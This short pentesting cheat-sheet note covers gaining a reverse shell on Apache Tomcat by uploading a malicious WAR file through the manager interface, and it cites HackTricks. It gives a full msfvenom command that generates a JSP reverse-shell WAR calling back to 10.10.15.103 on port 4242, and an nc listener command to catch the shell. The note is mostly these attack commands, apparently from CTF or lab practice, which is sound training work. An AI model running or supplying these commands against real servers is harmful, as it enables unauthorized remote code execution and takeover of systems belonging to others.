WAR upload reverse shell
- if we are in a tomcat environment
- there is the
management/htmlandmanagement/text - that allow to upload new applications
- we can create a malicious war file https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.15.103 LPORT=4242 -f war > reverse.war- now open a nc to listen
sudo nc -nvlp 4242 -vvv
- there is the